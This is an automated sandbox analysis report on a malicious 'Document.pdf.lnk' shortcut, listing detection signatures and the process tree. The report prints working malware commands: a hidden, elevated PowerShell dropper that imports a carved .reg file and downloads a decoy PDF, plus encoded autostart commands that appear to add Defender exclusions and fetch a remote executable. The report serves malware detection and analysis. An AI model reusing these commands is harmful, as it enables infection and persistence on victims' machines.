Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document.pdf.lnk

Overview

General Information

Sample name:Document.pdf.lnk
Analysis ID:1385501
MD5:1cdf8cedd29b81b611e4dd2bbf3b5e08
SHA1:79ae856226052b05ec389b2db7cdfd429418f760
SHA256:abd4dcb78a92e4f98b88199ce08f88a3ce99032390747de6f3222f8d4a71939d
Tags:lnk
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Powershell creates an autostart link
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses regedit.exe to modify the Windows registry
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • powershell.exe (PID: 5856 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')} MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-Location -Path '"C:\Users\user\Desktop"' ;$dirPath = Get-Location;Set-Location -Path '""' ;$lnkpaths = Get-ChildItem -Path '""' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\Document.pdf';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • regedit.exe (PID: 7288 cmdline: "C:\Windows\regedit.exe" /s C:\Users\Public\17399.reg MD5: 999A30979F6195BF562068639FFC4426)
      • Acrobat.exe (PID: 7360 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Document.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7552 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7800 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,67177622323241092,908084778299603848,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 7624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 8156 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6012 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQB MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, ProcessId: 8156, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, ProcessId: 8156, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, ProcessId: 8156, ProcessName: powershell.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1196, TargetFilename: C:\Users\Public\17399.reg
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: powershell -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlAFwA, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 7288, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\BatteryDiagnosticHelper
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA, ProcessId: 8156, ProcessName: powershell.exe
Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: powershell -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlAFwA, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 7288, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\BatteryDiagnosticHelper
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7624, ProcessName: svchost.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: Document.pdf.lnkVirustotal: Detection: 40%Perma Link
Source: Document.pdf.lnkReversingLabs: Detection: 34%
Source: Document.pdf.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
